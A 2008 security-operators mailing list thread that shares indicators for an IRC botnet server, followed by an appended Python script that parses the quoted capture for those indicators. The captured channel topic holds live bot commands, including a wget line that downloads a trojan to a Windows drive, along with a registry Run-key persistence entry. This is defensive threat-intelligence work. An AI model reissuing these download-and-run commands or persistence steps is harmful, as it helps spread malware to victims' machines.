[nsp-sec] ACK3356 - Re: history on irc.intelligence-tech.com

David Rossbach david at rossbachs.com
Tue Feb 26 14:39:43 EST 2008


Thanks Stephen and Jason for the additional information on this botnet.... I 
have contacted our customer and they are investigating and will clean this 
up!

Dave Rossbach
AS3356
Level3 Communications



----- Original Message ----- 
From: "Stephen Gill" <gillsr at cymru.com>
To: "Jason Chambers" <jchambers at ucla.edu>; "nsp-security NSP" 
<nsp-security at puck.nether.net>
Sent: Monday, February 25, 2008 3:25 PM
Subject: Re: [nsp-sec] history on irc.intelligence-tech.com


> ----------- nsp-security Confidential --------
>
> # telnet irc.intelligence-tech.com 21958
> Trying 8.14.145.68...
> Connected to irc.intelligence-tech.com.
> Escape character is '^]'.
> NICK b
> USER b b b :b
> :IntTech 001 a :MySQL  <...>
> :IntTech 376 a :
> :a MODE a :+i
> JOIN #hobo nutsack
> :<...> JOIN :#hobo
> :IntTech 332 a #hobo :.asc -S -s|.else status scan .asc asn 50 5 0 _b _r
> _h|.if nick *USA* .wkse 50 5 0 _b _r _h|.else nick *USA* .wkso 50 5 0 _b 
> _r
> _h|.r.wget http://8.14.145.115/~inttech/mstskmgr.exe c:\mstskmgr.exe h
> :IntTech 333 a #hobo 10:30 PM 1200102639
> :IntTech 366 a #hobo :End of /NAMES list.
>
> Brief history on that file:
>
> 2008-01-08 12:50:01     mstskmgr.exe.aug3.0017
> 2007-01-04 00:51:05     http://www.naturalgardening.net/mstskmgr.exe
> 2007-02-01 11:01:13     129517.mstskmgr.exe
> 2007-02-10 07:42:52     730a87979a5aa825c5b5f547e1e7d014.exe
> 2007-02-14 13:46:04     mstskmgr.exe
> 2007-02-26 13:31:08     mstskmgr.exe
> 2007-04-02 18:01:02     none
> 2007-06-06 21:23:48     4f1582d388f19cfab7042f97e94170bcfcd4913c
> 2007-07-12 21:31:15     mstskmgr.exe
> 2007-07-15 02:16:08     730a87979a5aa825c5b5f547e1e7d014.EX$
> 2007-07-24 04:11:52     730a87979a5aa825c5b5f547e1e7d014.EX$
> 2007-07-29 04:36:17     http://www.intelligence-tech.com/mstskmgr.exe
> 2007-08-22 11:41:32     http://www.intelligence-tech.com/mstskmgr.exe
> 2007-11-06 02:37:17     http://8.14.145.115/~inttech/mstskmgr.exe
> 2006-11-18 20:16:04     mstskmgr.exe
>
> dnsrr      count      dnsrr first seen
> www.intelligence-tech.com     8     2007-01-09 12:39:43
> www.int-tech.info     7     2007-01-09 12:39:43
>
> Adds:
>
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "MS Task
> Manager 32" = C:\WINDOWS\System32\mstskmgr.exe
>
> Mutex:
>
> MSTSKMGR32
>
> Since it has been around the block AV rate is pretty good:
>
> AV engine      Country      Signature
> Ahnlab     KR     Win-Trojan/Ranky.20480.F
> Aladdin (esafe)     IL     Win32.Ranky.de
> Alwil (avast)     CZ     Win32:Ranky-ED [Trj]
> Arcabit (arcavir)     PL     Trojan.Proxy.Ranky.De
> Authentium     US     W32/Proxy.gen1
> Avira (antivir)     DE     TR/Crypt.ULPM.Gen
> BitDefender     RO     Trojan.Proxy.Ranky.E
> CA (E-Trust Vet)     US     Win32/Ranck!generic
> CAT (quickheal)     IN     TrojanProxy.Ranky.de
> Central Command (vexira)     US     Trojan.PR.Ranky.FP
> ClamAV         no_virus
> CPsecure     US     no_virus
> Cybersoft (vfind)     US     no_virus
> Dr. Web     RU     Trojan.Proxy.1707
> Eset (nod32)     US     Win32/TrojanProxy.Ranky
> Fortinet     US     W32/Ranky.DE!tr
> Frisk (f-prot)     IS     W32/Proxy.gen1
> F-Secure     FI     Trojan-Proxy.Win32.Ranky.de
> Grisoft (avg)     CZ     Proxy.IAX
> Hauri (virobot)     KR     no_virus
> Ikarus     AT     Trojan-Proxy.Win32.Ranky.DE
> Kaspersky     RU     Trojan-Proxy.Win32.Ranky.de
> Mcafee     US     Proxy-FBSR.gen
> MicroWorld (escan)     IN     Trojan-Proxy.Win32.Ranky.de
> Norman     NO     W32/Rank.AHV
> Panda     ES     Trj/Ranky.QL
> Rising     CN     Trojan.Proxy.Ranky.ayw
> Securecomputing (webwasher)     US     Trojan.Crypt.ULPM.Gen
> Sophos     GB     Troj/Ranky-AU
> Symantec     US     Backdoor.Ranky
> TheHacker     PE     Trojan/Proxy.Ranky.de
> Trend Micro     JP     TROJ_RANKY.NF
> VirusBlokAda (vba32)     BY     Trojan-Proxy.Win32.Ranky.de
> VirusBuster     HU     Trojan.PR.Ranky.FP
>
> Proxy checks in to:
>
> http://www.int-tech.info/main.php?p=21164 -> the port it chose to listen 
> to
>
> Cheers,
> Steve, Team Cymru.
>
> On 2/25/08 1:41 PM, "Jason Chambers" <jchambers at ucla.edu> wrote:
>
>> ----------- nsp-security Confidential --------
>>
>> Hello all,
>>
>> I've noticed in our recent infections that 8.14.145.68 is involved with
>> a few.  Looking back at some past data, I see this botnet as far back as
>> 2007-03-04.
>>
>> Anyone have any more information on this one ?
>>
>> 3356  | LEVEL3 Level 3 Communications  | 8.14.145.68     | tcp  | 25394
>> | 2008-02-03 10:22:45 | 2008-02-11 10:22:45 | bot | 0 | 0 | ID: Int
>> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958
>>
>> 3356  | LEVEL3 Level 3 Communications  | 8.14.145.68     | tcp  | 25394
>> | 2007-03-04 09:49:52 | 2007-03-12 09:49:52 | bot | 0 | 0 | ID: Int
>> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958_6667
>>
>>
>> Thanks,
>
> -- 
> Stephen Gill, Chief Scientist, Team Cymru
> http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security 
> counter-measures.
> _______________________________________________
> 
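The telnet transcript quoted above shows the channel topic carrying the bot's command string, including the download URL and the local drop path. The following Python script is an added example, not part of this thread and not Team Cymru's or Level3's tooling, of how an analyst could pull those indicators out of such a capture for blocking and host checks: it re-joins the mail-wrapped lines, parses the RPL_TOPIC (numeric 332) reply, splits the topic into its pipe-separated commands and extracts URLs and drive-letter paths. The sample session is the quoted transcript with the "> " marks removed; the function and class names, the unwrapping heuristic and the fetch-and-drop rule are my own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: the telnet transcript quoted in the thread, with the mail
# client's "> " quote marks removed but its line wrapping left exactly as sent.
SAMPLE_SESSION = r"""
# telnet irc.intelligence-tech.com 21958
Trying 8.14.145.68...
Connected to irc.intelligence-tech.com.
Escape character is '^]'.
NICK b
USER b b b :b
:IntTech 001 a :MySQL  <...>
:IntTech 376 a :
:a MODE a :+i
JOIN #hobo nutsack
:<...> JOIN :#hobo
:IntTech 332 a #hobo :.asc -S -s|.else status scan .asc asn 50 5 0 _b _r
_h|.if nick *USA* .wkse 50 5 0 _b _r _h|.else nick *USA* .wkso 50 5 0 _b
_r
_h|.r.wget http://8.14.145.115/~inttech/mstskmgr.exe c:\mstskmgr.exe h
:IntTech 333 a #hobo 10:30 PM 1200102639
:IntTech 366 a #hobo :End of /NAMES list.
"""

# A line starts a new record if it is a server message (":prefix ..."), a
# client command (NICK/USER/JOIN), the shell prompt or a telnet banner line.
# Anything else is treated as a mail-wrapped continuation (assumption).
NEW_RECORD_RE = re.compile(r'^(:|#|[A-Z]{3,} |Trying |Connected |Escape )')
IRC_MSG_RE = re.compile(r'^:(?P<prefix>\S+) (?P<cmd>\S+) (?P<target>\S+) ?(?P<params>.*)$')
URL_RE = re.compile(r'https?://[^\s|]+')
DROP_PATH_RE = re.compile(r'(?i)\b[a-z]:\\[^\s|]+')


@dataclass
class TopicIndicators:
    channel: str
    topic: str
    commands: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    drop_paths: List[str] = field(default_factory=list)


def unwrap_mail_quote(text: str) -> List[str]:
    """Re-join lines a mail client wrapped, so each IRC message is one line."""
    records: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if records and not NEW_RECORD_RE.match(line):
            records[-1] += ' ' + line   # assumption: the wrap fell on a space
        else:
            records.append(line)
    return records


def parse_topic_reply(line: str) -> Optional[Tuple[str, str]]:
    """Return (channel, topic) for an RPL_TOPIC (numeric 332) reply, else None."""
    m = IRC_MSG_RE.match(line)
    if not m or m.group('cmd') != '332':
        return None
    channel, _, topic = m.group('params').partition(' :')
    return channel, topic


def analyze_session(text: str) -> List[TopicIndicators]:
    """Extract commands, URLs and local drop paths from every channel topic seen."""
    found = []
    for line in unwrap_mail_quote(text):
        parsed = parse_topic_reply(line)
        if parsed is None:
            continue
        channel, topic = parsed
        found.append(TopicIndicators(
            channel=channel,
            topic=topic,
            commands=[c.strip() for c in topic.split('|') if c.strip()],
            urls=URL_RE.findall(topic),
            drop_paths=DROP_PATH_RE.findall(topic),
        ))
    return found


def is_download_and_drop(ind: TopicIndicators) -> bool:
    """Heuristic (assumption): a topic pairing a URL with a local file path is
    telling bots to fetch and store a binary, which is worth alerting on."""
    return bool(ind.urls) and bool(ind.drop_paths)


if __name__ == '__main__':
    for ind in analyze_session(SAMPLE_SESSION):
        print(f'channel {ind.channel}: {len(ind.commands)} commands')
        print('  URLs to block/alert on:', ind.urls)
        print('  host paths to check   :', ind.drop_paths)
        print('  fetch-and-drop topic  :', is_download_and_drop(ind))
```

The unwrapping step matters in practice: topics pasted into mail or tickets arrive wrapped, and a naive line-by-line regex would miss the URL on the continuation line. The extracted URL and path, together with the Run key value and mutex name quoted above, are the pieces a customer's host check would look for.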



